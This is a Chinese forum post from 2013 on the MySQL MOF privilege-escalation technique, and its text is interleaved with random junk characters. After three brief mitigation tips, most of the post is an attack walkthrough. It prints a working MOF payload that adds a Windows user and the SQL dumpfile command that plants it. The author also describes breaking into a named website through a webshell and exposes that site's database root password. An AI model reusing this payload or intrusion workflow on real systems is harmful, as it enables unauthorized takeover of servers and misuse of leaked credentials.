Mysql mof扩展漏洞防范方法
; d0 o8 E( O1 ]5 f$ {( _9 g2 X2 H
网上公开的一些利用代码:
: p/ U1 f- _ e, ?* T2 y5 D% g. \5 P |0 ]" Y$ Y9 o* f5 l
#pragma namespace(“\\\\.\\root\\subscription”)* N! J# N( j9 ^, _1 _6 Q3 N
( i0 l1 ]( P* F" `) D3 v6 p/ Zinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };2 ?" O3 ~# p. \! j e9 X
' D, L5 a/ _5 z; m' g) M* e
9 W0 u! U8 o4 t2 a! V4 l
/ ]1 a- e" P7 i2 F2 [, {
2 u6 H% I! q7 j
Z! I; k7 D: V连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
3 R, N+ l! x& _从上面代码来看得出解决办法:, L+ C* Y8 @. q+ c3 T
9 p5 b% V+ o, J2 D8 C n1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数' `8 U* `5 c: c- _, Q
& b; I5 _0 B5 K0 ~$ n- B
2、禁止使用”WScript.Shel”组件
7 X3 G% _, N: i3 V j/ Z- t$ T" G# C- G0 |- |; t6 v9 K$ X
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
3 U7 F' X/ j2 n0 [6 r% ^" Q
# R; g) P& c2 e+ P7 i$ s! C* [当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下/ h: J2 E* h, n' |* q$ y, Q& r
" w6 I: g1 L* o) v1 a( a
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权2 a8 g- h# C- P! z4 j8 ^
) x; v' ^7 s7 i" M& z
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容' I# o" J1 A/ g- M; w5 ?
" R4 G' M7 v: u+ r: d% e+ x
看懂了后就开始练手吧! M, q% {/ y3 C( ]; c
1 d, }# x& p$ f8 j- {9 N k/ x, @3 Thttp://www.webbmw.com/config/config_ucenter.php 一句话 a
C. A2 b3 w4 `0 V. X% ]% x- A$ u' _( i8 \
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
R: ^( k- g0 ]+ C. x7 e5 \7 ] C# I8 `( n0 G
于是直接用菜刀开搞- ?! O, w6 h) g5 ?" A
^9 B$ D0 i4 F% w; j上马先
% ]% {6 t' t" I8 D
8 N6 H: r% s, s4 p. m6 p- J既然有了那些账号 之类的 于是我们就执行吧…….! R% q ]& C3 C5 H$ u* i
4 [: j( F3 i$ x2 ^8 p小小的说下6 y. r$ |- b9 y
o# H1 P- c! Q F在这里第1次执行未成功 原因未知4 e# Z' a0 R1 J3 ?
$ W/ n* x* o% S1 T. ?' ?
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。2 B5 e s1 l. i3 X1 U% Y6 S
4 {4 N5 ]3 R- a( M2 i
#pragma namespace(“\\\\.\\root\\subscription”)/ X2 k1 m: ?5 o$ X
* e- J/ D$ u/ x: l
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
: J0 e& i4 f7 W" |
; h+ q w4 @ @3 J2 J我是将文件放到C:\WINDOWS\temp\1.mof2 P" T' e! q3 K0 r
) V7 q7 _# u, S2 E) {所以我们就改下执行的代码
) ~5 P$ I. n7 @+ U7 \3 W
6 J/ ^/ E; \" V r0 Rselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
! v2 E( V; f( m$ H8 ?# ~( @+ ^) M+ m* M3 K
$ l' x# Q# y8 W5 W2 v; m
v7 P' r0 a' o& M6 r
但是 你会发现账号还是没有躺在那里。。! r+ d- T; O" r
9 y& l+ \1 U; ]' g$ W2 g" X( |. x! O
于是我就感觉蛋疼
- n9 f5 K8 v$ a* l6 V" [/ m% E7 e$ j7 Y) x
就去一个一个去执行 但是执行到第2个 mysql时就成功了………/ e8 _" v( ~1 g
9 ~: o9 W' P8 m4 b ~6 y! ?, \4 K3 W, K$ e( ^0 p& d+ F2 H
$ q# m) T: o+ k0 B! n4 ] o Z6 c! {
但是其他库均不成功…
( d _; C7 E7 H3 Z% Z
1 K) l4 V/ {9 h" ?/ \/ ?. c0 K! X我就很费解呀 到底为什么不成功求大牛解答…
2 |/ Z% ]8 _+ P$ F3 `2 {
: f. Q2 e3 `. d, F
5 v5 v1 ]% z/ `3 u, p3 o& @% u9 ]
9 r& [+ b% W$ O+ R9 g! g8 a |
发表于 2013-1-4 19:49:49
收藏
支持
反对